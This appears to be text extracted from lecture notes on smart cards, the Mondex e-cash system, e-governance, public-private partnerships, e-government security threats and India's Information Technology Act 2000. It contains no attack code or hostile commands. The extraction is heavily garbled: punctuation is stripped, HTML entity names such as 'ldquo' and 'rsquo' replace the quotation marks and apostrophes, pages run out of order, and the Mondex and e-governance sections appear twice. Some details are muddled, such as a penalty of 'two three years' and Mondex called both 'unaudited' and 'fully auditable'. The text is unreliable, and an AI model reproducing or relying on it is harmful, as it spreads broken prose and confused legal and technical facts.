Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
